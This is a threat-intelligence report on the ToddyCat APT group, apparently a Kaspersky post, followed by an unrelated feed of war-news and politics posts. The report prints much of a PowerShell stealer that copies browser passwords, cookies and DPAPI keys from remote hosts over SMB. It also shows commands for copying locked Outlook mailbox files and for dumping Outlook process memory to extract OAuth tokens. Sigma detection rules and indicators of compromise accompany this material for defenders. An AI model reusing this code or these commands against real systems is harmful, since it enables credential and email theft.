In a previous post on the ToddyCat group, we described the TomBerBil family of tools, which are designed to extract cookies and saved passwords from browsers on user hosts. These tools were written in C# and C++.

Yet, analysis of incidents from May to June 2024 revealed a new variant implemented in PowerShell. It retained the core malicious functionality of the previous samples but employed a different implementation approach and incorporated new commands.

A key feature of this version is that it was executed on domain controllers on behalf of a privileged user, accessing browser files via shared network resources using the SMB protocol.

Besides supporting the Chrome and Edge browsers, the new version also added processing for Firefox browser files.

The tool was launched using a scheduled task that executed the following command line:
powershell -exec bypass -command "c:\programdata\ip445.ps1"
The script begins by creating a new local directory, which is specified in the $baseDir variable. The tool saves all data it collects into this directory.
$baseDir = 'c:\programdata\temp\'

try{
New-Item -ItemType directory -Path $baseDir | Out-Null
}catch{

}
The script defines a function named parseFile, which accepts the full file path as a parameter. It opens the C:\programdata\uhosts.txt file and reads its content line by line using .NET Framework classes, returning the result as a string array. This is how the script forms an array of host names.
function parseFile{
param(
[string]$fileName
)

$fileReader=[System.IO.File]::OpenText($fileName)

while(($line = $fileReader.ReadLine()) -ne $null){
try{
$line.trim()
}
catch{
}
}
$fileReader.close()
}
For each host in the array, the script attempts to establish an SMB connection to the shared resource c$, constructing the path in the \\\c$\users\ format. If the connection is successful, the tool retrieves a list of user directories present on the remote host. If at least one directory is found, a separate folder is created for that host within the $baseDir working directory:
foreach($myhost in parseFile('c:\programdata\uhosts.txt')){
$myhost=$myhost.TrimEnd()
$open=$false

$cpath = "\\{0}\c$\users\" -f $myhost
$items = @(get-childitem $cpath -Force -ErrorAction SilentlyContinue)

$lpath = $baseDir + $myhost
try{
New-Item -ItemType directory -Path $lpath | Out-Null
}catch{

}
In the next stage, the script iterates through the user folders discovered on the remote host, skipping any folders specified in the $filter_users variable, which is defined upon launching the tool. For the remaining folders, three directories are created in the script’s working folder for collecting data from Google Chrome, Mozilla Firefox, and Microsoft Edge.
$filter_users = @('public','all users','default','default user','desktop.ini','.net v4.5','.net v4.5 classic')

foreach($item in $items){

$username = $item.Name
if($filter_users -contains $username.tolower()){
continue
}
$upath = $lpath + '\' + $username

try{
New-Item -ItemType directory -Path $upath | Out-Null
New-Item -ItemType directory -Path ($upath + '\google') | Out-Null
New-Item -ItemType directory -Path ($upath + '\firefox') | Out-Null
New-Item -ItemType directory -Path ($upath + '\edge') | Out-Null
}catch{

}
Next, the tool uses the default account to search for the following Chrome and Edge browser files on the remote host:

Login Data: a database file that contains the user’s saved logins and passwords for websites in an encrypted format
Local State: a JSON file containing the encryption key used to encrypt stored data
Cookies: a database file that stores HTTP cookies for all websites visited by the user
History: a database that stores the browser’s history

These files are copied via SMB to the local folder within the corresponding user and browser folder hierarchy. Below is a code snippet that copies the Login Data file:
$googlepath = $upath + '\google\'
$firefoxpath = $upath + '\firefox\'
$edgepath = $upath + '\edge\'
$loginDataPath = $item.FullName + "\AppData\Local\Google\Chrome\User Data\Default\Login Data"
if(test-path -path $loginDataPath){
$dstFileName = "{0}\{1}" -f $googlepath,'Login Data'
copy-item -Force -Path $loginDataPath -Destination $dstFileName | Out-Null
}
The same procedure is applied to Firefox files, with the tool additionally traversing through all the user profile folders of the browser. Instead of the files described above for Chrome and Edge, the script searches for files which have names from the $firefox_files array that contain similar information. The requested files are also copied to the tool’s local folder.
$firefox_files = @('key3.db','signons.sqlite','key4.db','logins.json')

$firefoxBase = $item.FullName + '\AppData\Roaming\Mozilla\Firefox\Profiles'
if(test-path -path $firefoxBase){
$profiles = @(get-childitem $firefoxBase -Force -ErrorAction SilentlyContinue)
foreach($profile in $profiles){
if(!(test-path -path ($firefoxpath + '\' + $profile.Name))){
New-Item -ItemType directory -Path ($firefoxpath + '\' + $profile.Name) | Out-Null
}
foreach($firefox_file in $firefox_files){
$tmpPath = $firefoxBase + '\' + $profile.Name + '\' + $firefox_file
if(test-path -Path $tmpPath){
$dstFileName = "{0}\{1}\{2}" -f $firefoxpath,$profile.Name,$firefox_file
copy-item -Force -Path $tmpPath -Destination $dstFileName | Out-Null
}
}
}
}
The copied files are encrypted using the Data Protection API (DPAPI). The previous version of TomBerBil ran on the host and copied the user’s token. As a result, in the user’s current session DPAPI was used to decrypt the master key, and subsequently, the files. The updated server-side version of TomBerBil copies files containing the user encryption keys that are used by DPAPI. These keys, combined with the user’s SID and password, grant the attackers the ability to decrypt all the copied files locally.
if(test-path -path ($item.FullName + '\AppData\Roaming\Microsoft\Protect')){
copy-item -Recurse -Force -Path ($item.FullName + '\AppData\Roaming\Microsoft\Protect') -Destination ($upath + '\') | Out-Null
}
if(test-path -path ($item.FullName + '\AppData\Local\Microsoft\Credentials')){
copy-item -Recurse -Force -Path ($item.FullName + '\AppData\Local\Microsoft\Credentials') -Destination ($upath + '\') | Out-Null
}
With TomBerBil, the attackers automatically collected user cookies, browsing history, and saved passwords, while simultaneously copying the encryption keys needed to decrypt the browser files. The connection to the victim’s remote hosts was established via the SMB protocol, which significantly complicated the detection of the tool’s activity.

TomBerBil in PowerShell

As a rule, such tools are deployed at later stages, after the adversary has established persistence within the organization’s internal infrastructure and obtained privileged access.

Detection

To detect the implementation of this attack, it’s necessary to set up auditing for access to browser folders and to monitor network protocol connection attempts to those folders.
title: Access To Sensitive Browser Files Via Smb
id: 9ac86f68-9c01-4c9d-897a-4709256c4c7b
status: experimental
description: Detects remote access attempts to browser files containing sensitive information
author: Kaspersky
date: 2025-08-11
tags:
- attack.credential-access
- attack.t1555.003
logsource:
product: windows
service: security
detection:
event:
EventID: '5145'
chromium_files:
ShareLocalPath|endswith:
- '\User Data\Default\History'
- '\User Data\Default\Network\Cookies'
- '\User Data\Default\Login Data'
- '\User Data\Local State'
firefox_path:
ShareLocalPath|contains: '\AppData\Roaming\Mozilla\Firefox\Profiles'
firefox_files:
ShareLocalPath|endswith:
- 'key3.db'
- 'signons.sqlite'
- 'key4.db'
- 'logins.json'
condition: event and (chromium_files or firefox_path and firefox_files)
falsepositives: Legitimate activity
level: medium
In addition, auditing for access to the folders storing the DPAPI encryption key files is also required.
title: Access To System Master Keys Via Smb
id: ba712364-cb99-4eac-a012-7fc86d040a4a
status: experimental
description: Detects remote access attempts to the Protect file, which stores DPAPI master keys
references:
- synacktiv.com/en/publications/…
author: Kaspersky
date: 2025-08-11
tags:
- attack.credential-access
- attack.t1555
logsource:
product: windows
service: security
detection:
selection:
EventID: '5145'
ShareLocalPath|contains: 'windows\System32\Microsoft\Protect'
condition: selection
falsepositives: Legitimate activity
level: medium

Stealing emails from Outlook

The modified TomBerBil tool family proved ineffective at evading monitoring tools, compelling the threat actor to seek alternative methods for accessing the organization’s critical data. We discovered an attempt to gain access to corporate correspondence files in the local Outlook storage.

The Outlook application stores OST (Offline Storage Table) files for offline use. The names of these files contain the address of the mailbox being cached. Outlook uses OST files to store a local copy of data synchronized with mail servers: Microsoft Exchange, Microsoft 365, or Outlook.com. This capability allows users to work with emails, calendars, contacts, and other data offline, then synchronize changes with the server once the connection is restored.

However, access to an OST file is blocked by the application while Outlook is running. To copy the file, the attackers created a specialized tool called TCSectorCopy.

TCSectorCopy

This tool is designed for block-by-block copying of files that may be inaccessible by applications or the operating system, such as files that are locked while in use.

The tool is a 32-bit PE file written in C++. After launch, it processes parameters passed via the command line: the path to the source file to be copied and the path where the result should be saved. The tool then validates that the source path is not identical to the destination path.

Validating the TCSectorCopy command line parameters

Next, the tool gathers information about the disk hosting the file to be copied: it determines the cluster size, file system type, and other parameters necessary for low-level reading.

Determining the disk’s file system type

TCSectorCopy then opens the disk as a device in read-only mode and sequentially copies the file content block by block, bypassing the standard Windows API. This allows the tool to copy even the files that are locked by the system or other applications.

The adversary uploaded this tool to target host and used it to copy user OST files:
xCopy.exe C:\Users\<user>\AppData\Local\Microsoft\Outlook\<email>@<domain>.ost <email>@<domain>.ost2
Having obtained the OST files, the attackers processed them using a separate tool to extract the email correspondence content.

XstReader

XstReader is an open-source C# tool for viewing and exporting the content of Microsoft Outlook OST and PST files. The attackers used XstReader to export the content of the previously copied OST files.

XstReader is executed with the -e parameter and the path to the copied file. The -e parameter specifies the export of all messages and their attachments to the current folder in the HTML, RTF, and TXT formats.
XstExport.exe -e <email>@<domain>.ost2
After exporting the data from the OST file, the attackers review the list of obtained files, collect those of interest into an archive, and exfiltrate it.

Stealing data with TCSectorCopy and XstReader

Detection

To detect unauthorized access to Outlook OST files, it’s necessary to set up auditing for the %LOCALAPPDATA%\Microsoft\Outlook\ folder and monitor access events for files with the .ost extension. The Outlook process and other processes legitimately using this file must be excluded from the audit.
title: Access To Outlook Ost Files
id: 2e6c1918-08ef-4494-be45-0c7bce755dfc
status: experimental
description: Detects access to the Outlook Offline Storage Table (OST) file
author: Kaspersky
date: 2025-08-11
tags:
- attack.collection
- attack.t1114.001
logsource:
product: windows
service: security
detection:
event:
EventID: 4663
outlook_path:
ObjectName|contains: '\AppData\Local\Microsoft\Outlook\'
ost_file:
ObjectName|endswith: '.ost'
condition: event and outlook_path and ost_file
falsepositives: Legitimate activity
level: low
The TCSectorCopy tool accesses the OST file via the disk device, so to detect it, it’s important to monitor events such as Event ID 9 (RawAccessRead) in Sysmon. These events indicate reading directly from the disk, bypassing the file system.

As we mentioned earlier, TCSectorCopy receives the path to the OST file via a command line. Consequently, detecting this tool’s malicious activity requires monitoring for a specific OST file naming pattern: the @ symbol and the .ost extension in the file name.

Example of detecting TCSectorCopy activity in KATA

Stealing access tokens from Outlook

Since active file collection actions on a host are easily tracked using monitoring systems, the attackers’ next step was gaining access to email outside the hosts where monitoring was being performed. Some target organizations used the Microsoft 365 cloud office suite. The attackers attempted to obtain the access token that resides in the memory of processes utilizing this cloud service.

In the OAuth 2.0 protocol, which Microsoft 365 uses for authorization, the access token is used when requesting resources from the server. In Outlook, it is specified in API requests to the cloud service to retrieve emails along with attachments. Its disadvantage is its relatively short lifespan; however, this can be enough to retrieve all emails from a mailbox while bypassing monitoring tools.

The access token is stored using the JWT (JSON Web Tokens) standard. The token content is encoded using Base64. JWT headers for Microsoft applications always specify the typ parameter with the JWT value first. This means that the first 18 characters of the encoded token will always be the same.

The attackers used SharpTokenFinder to obtain the access token from the user’s Outlook application. This tool is written in C# and designed to search for an access token in processes associated with the Microsoft 365 suite. After launch, the tool searches the system for the following processes:

“TEAMS”
“WINWORD”
“ONENOTE”
“POWERPNT”
“OUTLOOK”
“EXCEL”
“ONEDRIVE”
“SHAREPOINT”

If these processes are found, the tool attempts to open each process’s object using the OpenProcess function and dump their memory. To do this, the tool imports the MiniDumpWriteDump function from the dbghelp.dll file, which writes user mode minidump information to the specified file. The dump files are saved in the dump folder, located in the current SharpTokenFinder directory. After creating dump files for the processes, the tool searches for the following string pattern in each of them:
"eyJ0eX[a-zA-Z0-9\\._\\-]+"
This template uses the first six symbols of the encoded JWT token, which are always the same. Its structures are separated by dots. This is sufficient to find the necessary string in the process memory dump.

Example of a JWT Token

In the incident being described, the local security tools (EPP) blocked the attempt to create the OUTLOOK.exe process dump using SharpTokenFinder, so the operator used ProcDump from the Sysinternals suite for this purpose:
procdump64.exe -accepteula -ma OUTLOOK.exe
dir c:\windows\temp\OUTLOOK.EXE_<id>.dmp
c:\progra~1\winrar\rar.exe a -k -r -s -m5 -v100M %temp%\dmp.rar c:\windows\temp\OUTLOOK.EXE_<id>.dmp
Here, the operator executed ProcDump with the following parameters:

accepteula silently accepts the license agreement without displaying the agreement window.
ma indicates that a full process dump should be created.
exe is the name of the process to be dumped.

The dir command is then executed as a check to confirm that the file was created and is not zero size. Following this validation, the file is added to a dmp.rar archive using WinRAR. The attackers sent this file to their host via SMB.

Detection

To detect this technique, it’s necessary to monitor the ProcDump process command line for names belonging to Microsoft 365 application processes.
title: Dump Of Office 365 Processes Using Procdump
id: 5ce97d80-c943-4ac7-8caf-92bb99e90e90
status: experimental
description: Detects Office 365 process names in the command line of the procdump tool
author: kaspersky
date: 2025-08-11
tags:
- attack.lateral-movement
- attack.defense-evasion
- attack.t1550.001
logsource:
category: process_creation
product: windows
detection:
selection:
Product: 'ProcDump'
CommandLine|contains:
- 'teams'
- 'winword'
- 'onenote'
- 'powerpnt'
- 'outlook'
- 'excel'
- 'onedrive'
- 'sharepoint'
condition: selection
falsepositives: Legitimate activity
level: high
Below is an example of the ProcDump tool from the Sysinternals package used to dump the Outlook process memory, detected by Kaspersky Anti Targeted Attack (KATA).

Example of Outlook process dump detection in KATA

Takeaways

The incidents reviewed in this article show that ToddyCat APT is constantly evolving its techniques and seeking new ways to conceal its activity aimed at gaining access to corporate correspondence within compromised infrastructure. Most of the techniques described here can be successfully detected. For timely identification of these techniques, we recommend using both host-based EPP solutions, such as Kaspersky Endpoint Security for Business, and complex threat monitoring systems, such as Kaspersky Anti Targeted Attack. For comprehensive, up-to-date information on threats and corresponding detection rules, we recommend Kaspersky Threat Intelligence.

Indicators of compromise

Malicious files
55092E1DEA3834ABDE5367D79E50079A ip445.ps1
2320377D4F68081DA7F39F9AF83F04A2 xCopy.exe
B9FDAD18186F363C3665A6F54D51D3A0 stf.exe

Not-a-virus files
49584BD915DD322C3D84F2794BB3B950 XstExport.exe

File paths
C:\programdata\ip445.ps1
C:\Windows\Temp\xCopy.exe
C:\Windows\Temp\XstExport.exe
c:\windows\temp\stf.exe

PDB
O:\Projects\Penetration\Tools\SectorCopy\Release\SectorCopy.pdb

securelist.com/toddycat-apt-st…

Cybersecurity & cyberwarfare

2 mesi fa • •

Cybersecurity & cyberwarfare
2 mesi fa • •

Garante Privacy in crisi: il Segretario Generale lascia dopo la richiesta sulle email dei dipendenti

Il Segretario Generale del Garante per la protezione dei dati personali, Angelo Fanizza, ha rassegnato le proprie dimissioni a seguito di una riunione straordinaria tenuta questa mattina nella sala Rodotà.

Lo riporta ilfattoquotidiano, specificando che l’incontro, convocato in un clima già teso, si è trasformato in uno dei momenti più critici per l’Autorità dalla sua istituzione.

Al centro della vicenda c’è una disposizione che Fanizza aveva rivolto a Cosimo Comella, dirigente responsab

... mostra di più

Garante Privacy in crisi: il Segretario Generale lascia dopo la richiesta sulle email dei dipendenti

Lo riporta ilfattoquotidiano, specificando che l’incontro, convocato in un clima già teso, si è trasformato in uno dei momenti più critici per l’Autorità dalla sua istituzione.

Al centro della vicenda c’è una disposizione che Fanizza aveva rivolto a Cosimo Comella, dirigente responsabile della sicurezza informatica.

L’ordine prevedeva la raccolta integrale delle email di tutti i dipendenti a partire dal marzo 2001 – si parla di un archivio di 24 anni – oltre agli accessi VPN, alle cartelle condivise e alla sospensione dei log interni.

L’obiettivo dichiarato era individuare chi avesse fornito informazioni a Report e al Fatto Quotidiano su questioni interne considerate sensibili.

Comella, il giorno successivo, ha comunicato per iscritto la propria indisponibilità a eseguire la richiesta, definendola in contrasto con le stesse norme emanate dal Garante in materia di tutela dei dati personali.

Nella risposta ha inoltre evidenziato l’impraticabilità tecnica dell’operazione: per archiviare l’intero volume di corrispondenza servirebbero circa 20 mila DVD, oltre 4.000 ore di lavoro e più di un anno e mezzo dedicato alla sola fase di masterizzazione.

La sua posizione è stata letta in assemblea davanti a circa 140-150 dipendenti, che si sono alzati in piedi applaudendolo per diversi minuti.

Durante la pausa, i lavoratori hanno approvato all’unanimità una mozione con cui chiedevano le dimissioni del collegio dirigente e dello stesso Segretario Generale. Nel corso del dibattito, Fanizza avrebbe cercato di coinvolgere la dirigenza per difendere la scelta, senza ricevere alcun sostegno.

Nelle stesse ore, è stato inoltre segnalato un tentativo di accesso non autorizzato ai server dell’Autorità, avvenuto mentre era in corso la ricerca della presunta “talpa”.

Le dimissioni di Fanizza rappresentano il primo atto formale nella gestione della crisi, mentre l’Autorità si prepara ad affrontare le conseguenze istituzionali e operative della vicenda.

L'articolo Garante Privacy in crisi: il Segretario Generale lascia dopo la richiesta sulle email dei dipendenti proviene da Red Hot Cyber.

воля

2 mesi fa • •

воля
2 mesi fa • •

воля

2 mesi fa • •

воля
2 mesi fa • •

воля

2 mesi fa • •

воля
2 mesi fa • •

Украина нуждается в финансовой поддержке, а не в политических обещаниях — МИД Литвы Кястутис Будрис

воля

2 mesi fa • •

воля
2 mesi fa • •

воля

2 mesi fa • •

воля
2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦

2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦
2 mesi fa • •

On November 21, 2013, the Euromaidan protests began in Kyiv, ignited by ousted President Yanukovych’s abrupt refusal to sign the EU-Ukraine Association Agreement in favor of closer ties with Russia. What started in Independence Square grew into a nationwide uprising against corruption, authoritarianism, and Russian influence.

воля

2 mesi fa • •

воля
2 mesi fa • •

воля

2 mesi fa • •

воля
2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦

2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦
2 mesi fa • •

On the Kostyantynivka axis, Ukrainian drone teams from “Spalakh,” Kurt & Company, along with the 1st and 3rd Battalions of the 28th Mechanized Brigade neutralized advancing Russian infantry. Their cover positions were destroyed, an artillery gun targeting Ukrainian lines was completely dismantled, and transport was reduced to scorched metal.

воля

2 mesi fa • •

воля
2 mesi fa • •

воля

2 mesi fa • •

воля
2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦

2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦
2 mesi fa • •

A downed Russian kamikaze drone crashes into the sea near Odesa. Russia has been relentlessly attacking the city with waves of Shahed drones since last night.

воля

2 mesi fa • •

воля
2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦

2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦
2 mesi fa • •

Another Russian assault on Novopavlivka repelled. Two BMPs and infantry attacked from multiple directions but were stopped by mines and defensive fire. Around 30 Russian troops were eliminated. Despite heavy fog, no Russian forces reached the village.

воля

2 mesi fa • •

воля
2 mesi fa • •

ЗСУ ліквідували ще 1050 окупантів.

воля

2 mesi fa • •

воля
2 mesi fa • •

воля

2 mesi fa • •

воля
2 mesi fa • •

kravietz 🦇

2 mesi fa • •

kravietz 🦇
2 mesi fa • •

A few obvious ambushes for #Ukraine in the “28 points peace plan” leaked by Ukrainian media (but note, many sources say it’s not the real plan passed to Ukraine’s government but a modified version):

7 b,d - a single attack from Ukraine on Russia basically cancels the whole US guarantees, and it is a fantastic recipe for repeat of 1999 “Basayev’s raid on Dagestan”, that is where a single “rogue commander” can restart the war at a moment suitable for Russia. Alternatively, if Russia can’t recruit any “rogue commander” it can just stage a terrorist attack on its territory unavoidably discovering “Ukrainian traces”. This is literally how Russia cancelled its peace agreement with Ichkeria in 1999.
16 - legal ban on invading each other. Except Russia already has a article 353 of Criminal Code which makes it a crime to “plan, prepare or execute an aggressive war” and you can see, Russian courts are overloaded

... mostra di più

7 b,d - a single attack from Ukraine on Russia basically cancels the whole US guarantees, and it is a fantastic recipe for repeat of 1999 “Basayev’s raid on Dagestan”, that is where a single “rogue commander” can restart the war at a moment suitable for Russia. Alternatively, if Russia can’t recruit any “rogue commander” it can just stage a terrorist attack on its territory unavoidably discovering “Ukrainian traces”. This is literally how Russia cancelled its peace agreement with Ichkeria in 1999.
16 - legal ban on invading each other. Except Russia already has a article 353 of Criminal Code which makes it a crime to “plan, prepare or execute an aggressive war” and you can see, Russian courts are overloaded with criminal cases against Putin (not)
20 b - removal of any restrictions of Russian and Ukrainian schools and media in both countries. Absurd, granted that there is literally 0 (zero) Ukrainian schools or media in Russia, who has even purged Ukrainian libraries since 2014.
20 c - “ban on Nazism” in both countries - the absurdity of this point is that Nazism is already banned in both Russia and Ukraine. Except in Russia, the law called “ban on Nazism” doesn’t really ban Nazism but… anti-Soviet fighters, that may or may not include Nazis. Add to that the highly flexible approach to written law in Russia, which involves absence of prosecution of outright Nazis like Milchakov, “Topaz”, “Espanola”, simply because “they are ours”.
21 subpoints about territorial changes chaotically mix de facto recognition and “international recognition” in a way that implies that the Kramators and Slovyansk aglomeration will become a massive legal blackhole, where neither Ukrainian nor Russian armed forces will be present, which of course means control by “Wagner” or some other such shady structure.
26 - mutual amnesty for everyone. A fantastic lesson and prize for Russian war criminals which essentially proves that doing war crimes works in long term.
27 - “execution of the treaty will be controlled”, except it won’t because another item bans presence of any foreign forces in Ukraine or the occupied territories. Which means there will be no external oversight and it will be the fox who will be guarding the henhouse.

And that’s pretty much it! I don’t see item 6 which assumes “reduction of Ukrainian armed forces to 600’000” as an ambush, because it’s really much higher than it was before 2022 (250k)! Compared to today wartime 1m it’s 40% reduction, but at ceasefire Ukraine won’t be able nor willing to sustain such a large army anyway.

Granted that this is not the final agreement but likely some kind of test for the public opinion I wouldn’t say it’s “capitulation of Ukraine”. Yes, voluntary surrender of Kramatorsk and Slovyansk is painful, but then you need to think how much longer they will hold and at which cost. I don’t know that and I assume only Kyiv knows how much reserves they still have.

I would say the opposite, the plan much more resembles capitulation of Russia because the mere fact that Russia agrees to “line of contact” and exit from Sumy, Kharkiv, Dnipropetrovsk region is a viisible failure of Putin’s explicit 2023 plan of annexation.

Everything else in this plan is Putin’s failure of his 2022 implicit plan of regime change in Ukraine, so in total it’s a complete Russian failure in the war, because at the cost of 1.5m soldiers and setting their economy 10 year back they gain burned out ruins of town they themselves ruined and promise of partial lifting of sanctions, so merely a chance to gradually start returning to pre-2022 trade, except nobody will treat them the same way and trust them.

And at on top of all this they will get ~1m violent and traumatised veterans returning home to… what exactly? Towns that were underinvested shitholes even before 2022 and for the last few years they have degraded even further because Russia redirected all money on the war effort.

#ukraine

NOELREPORTS 🇪🇺 🇺🇦

2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦
2 mesi fa • •

Ukraine’s P1-SUN drone interceptor is now taking down Russian Shaheds. Developed by SkyFall. With speeds up to 408 km/h, it’s a fast, homegrown answer to Russia’s kamikaze drones.

NOELREPORTS 🇪🇺 🇺🇦

2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦
2 mesi fa • •

Around 150 meters of railway track were destroyed in Irkutsk Oblast after a locomotive and nine coal wagons derailed, according to Russia’s transport prosecutor. The incident halted all train traffic on the Alzamay-Oblepikha stretch of the East Siberian Railway.

NOELREPORTS 🇪🇺 🇺🇦

2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦
2 mesi fa • •

U.S. envoy to the UN Mike Waltz warned that new sanctions could hit Russia if it continues to ignore calls for peace. He said Washington offered generous terms, including sanctions relief, and urged Russia to engage with Ukraine.

Generous terms? You mean almost everything Russia wants.

NOELREPORTS 🇪🇺 🇺🇦

2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦
2 mesi fa • •

A swarm of Shahed drones is flying at very low altitude over Odesa, with dozens launched by Russia. One drone struck a residential building on the city’s coastline. Odesa has been under continuous attack since last night.

Russia-Ukraine Daily News

2 mesi fa • •

Russia-Ukraine Daily News
2 mesi fa • •

💬 #Ukraine called on its partners to respect its position as work continues on the technical level to study a U.S.-backed plan to end the war, a senior Ukrainian official said on Friday.

reuters.com/world/europe/kyiv-…

#ukraine

Auschwitz Memorial

2 mesi fa • •

Auschwitz Memorial
2 mesi fa • •

21 November 1874 | A Czech Romani woman, Magdalena Holomek, was born in Skalka.

In #Zigeunerlager (Gypsy camp) in #Auschwitz II-Birkenau from 9 March 1943.
No. Z-1381
She perished in the camp on 23 June 1943.
---

The fate of the Roma and Sinti in Auschwitz:
Podcast: youtu.be/eb31osDbyk0
Lesson: lekcja.auschwitz.org/en_roma_a…

"On Auschwitz" (7): the fate of Roma and Sinti in Auschwitz

At least 23,000 Roma and Sinti people - including 11 thousand children were deported by the Nazi German regime to Auschwitz. After the Jews and Poles they ar...

^YouTube

#auschwitz #zigeunerlager

Ragnar Bjartur Gudmundsson

2 mesi fa • •

Ragnar Bjartur Gudmundsson
2 mesi fa • •

⚡️ WAR IN UKRAINE & RUSSIA — NOV 21, 2025

■ Casualties above the 7-day average despite fewer engagements
■ Equipment losses below average, with relatively few drone losses
■ Overnight attacks: triple-digit, all drones; decent interception rate
■ MLRS strikes are down, while air strikes are slightly above average; two 🇺🇦 strikes reported

📈 See dashboard for full data:
lookerstudio.google.com/s/vFHB…

Dashboard on the War in Ukraine & Russia

Looker Studio turns your data into informative dashboards and reports that are easy to read, easy to share, and fully customizable.

^{Looker Studio}

Ulfh3dnar

2 mesi fa • •

Ulfh3dnar
2 mesi fa • •

Sensitive content

#ukraine #russia #UkraineRussiaWar

Ulfh3dnar

2 mesi fa • •

Ulfh3dnar
2 mesi fa • •

Sensitive content

#ukraine #russia #UkraineRussiaWar

NOELREPORTS 🇪🇺 🇺🇦

2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦
2 mesi fa • •

During the night of Nov 20–21, Russia launched a drone attack on Ukraine using 115 UAVs, including around 70 Shaheds. Ukrainian air defense successfully shot down or jammed 95 of them. However, 19 struck targets across 12 locations, hitting civilian areas in Chernihiv, Dnipro, Kharkiv, and Odesa.

NOELREPORTS 🇪🇺 🇺🇦

2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦
2 mesi fa • •

U.S. sanctions targeting Russian oil firms have officially taken effect, potentially stranding 48 million barrels of Russian crude at sea, Bloomberg reports. Indian refineries are now turning to Middle Eastern suppliers, while traders scramble to reroute Rosneft and Lukoil shipments already in transit. Even in Asia, not all barrels may find buyers.

Ulfh3dnar

2 mesi fa • •

Ulfh3dnar
2 mesi fa • •

Sensitive content

#ukraine #russia #UkraineRussiaWar

in reply to Ulfh3dnar

Ulfh3dnar

in reply to Ulfh3dnar • 2 mesi fa • •

Sensitive content

#ukraine #russia #UkraineRussiaWar

NOELREPORTS 🇪🇺 🇺🇦

2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦
2 mesi fa • •

In Slavyansk-on-Kuban, a drone strike reportedly hit a brick factory, causing serious damage. Debris is scattered near a Magnet store in Kubris. Emergency services are on site. Locals are being warned not to touch the fragments.

NOELREPORTS 🇪🇺 🇺🇦

2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦
2 mesi fa • •

Scoop via Axios: Trump’s peace plan includes a NATO-style Article 5 security guarantee for Ukraine. The draft says any future major Russian attack would be treated as a threat to the entire transatlantic community, with the U.S. and Europe potentially responding with force.

Russia-Ukraine Daily News

2 mesi fa • •

Russia-Ukraine Daily News
2 mesi fa • •

🇷🇺 🇺🇦 Morning Briefing:

- Zelensky ready for 'honest' work on US-backed plan as Europeans push back
- India's Reliance stops importing Russian crude for refinery operations
- Bosnia, US eye pipeline to cut Russian gas dependency
- Austria’s Swarovski Optik is still sending sniper scopes to Russia
- Russia says it held talks with China on missile defence and nuclear issues
- Poland to provide Ukraine with $100m for weapons under PURL

1/2🧵

#ukraine #europe #russia #usa #russiaukraineWar

#ukraine #europe #russia #usa #russiaukrainewar

in reply to Russia-Ukraine Daily News

Russia-Ukraine Daily News

in reply to Russia-Ukraine Daily News • 2 mesi fa • •

2/2

- Pro-Kremlin activists harass Polish ambassador in St. Petersburg
- Poland requests extradition of sabotage suspects from Belarus
- 16 people still missing in Ternopil after devastating Russian missile strike

📨 Daily newsletter: russia-ukraine-newsletter.beeh…

💬 Telegram: t.me/russiaukrainedaily

#ukraine #europe #russia #usa #russiaukraineWar

Russia-Ukraine Daily News

The latest news about Russia and Ukraine, hand-picked for you every weekday morning (09:30-10:00 GMT+3).

^{Russia-Ukraine Daily News}

#ukraine #europe #russia #usa #russiaukrainewar

Ulfh3dnar

2 mesi fa • •

Ulfh3dnar
2 mesi fa • •

Sensitive content

#ukraine #russia #UkraineRussiaWar

NOELREPORTS 🇪🇺 🇺🇦

2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦
2 mesi fa • •

Russian losses per 21/11/25 reported by the Ukrainian General Staff

+1050 men
+3 ACVs
+20 artillery
+150 UAVs

воля

2 mesi fa • •

воля
2 mesi fa • •

Будь-яка пропозиція щодо мирної угоди з Росією повинна мати згоду України, - Стармер

воля

2 mesi fa • •

воля
2 mesi fa • •

Європейські лідери готують альтернативний «мирний план» зі справедливішими умовами для України, - WSJ

воля

2 mesi fa • •

воля
2 mesi fa • •

Eugene McParland 🇺🇦

2 mesi fa • •

Eugene McParland 🇺🇦
2 mesi fa • •

US to brief #EU ambassadors in Kyiv today on a peace plan, while #Ukraine engages in technical consultations with the US. Kyiv emphasizes mutual respect for proposals and its own stance.

news.sky.com/story/ukraine-war…

Ukraine war latest: Trump's peace plan revealed in full - but Zelenskyy says his team must check it's 'genuine'

A 28-point US peace plan, hatched during "secret" talks, has been revealed and presented to Ukraine's Volodymyr Zelenskyy - who has agreed to work on the proposals, while staking his hopes on American power ensuring Russia is serious about ending the…

^{Sky News}

#ukraine #eu

reshared this

Oliver⚡

2 mesi fa • •

Oliver⚡
2 mesi fa • •

Innerhalb von 8 Minuten einen frischen Hubzilla Server (bei Uberspace) aufgesetzt und jetzt synchronisiert mein Hauptprofil (anderer Server) eine Weile um einen Klon zu erstellen. Kontakte, Beiträge, Dateien, Bilder, alles da, alles synchron. Mehr perfektes Backup geht kaum.
Nomadische Identität = magic! 🙂

#hubzilla #fediverse #nomad

#fediverse #Hubzilla #nomad

Katharina Nocun

2 mesi fa • •

Katharina Nocun
2 mesi fa • •

Entzauberung, die

(Das Verhalten autoritärer Akteure wird an der Macht nicht entzaubert. Es wird normalisiert. Und man stellt ihnen ohne Not mächtige Werkzeuge zum Rückbau der Demokratie zur Verfügung.)

Spiegel: Nach Aufruf zur Befehlsverweigerung Trump droht Demokraten mit Todesstrafe Donald Trump hat sechs Demokraten »aufwieglerisches Verhalten« vorgeworfen. Dieses sei mit dem Tode zu bestrafen. Auslöser war ein Aufruf an Soldaten, Befehle zu verweigern, die gegen das Gesetz verstoßen. 20.11.2025, 18.49 Uhr Foto: Donald Trump während einer Veranstaltung im US-Bundesstaat Virginia Foto: Andrew Harnik / Getty Images / AFP

in reply to Katharina Nocun

Michael 🇺🇦

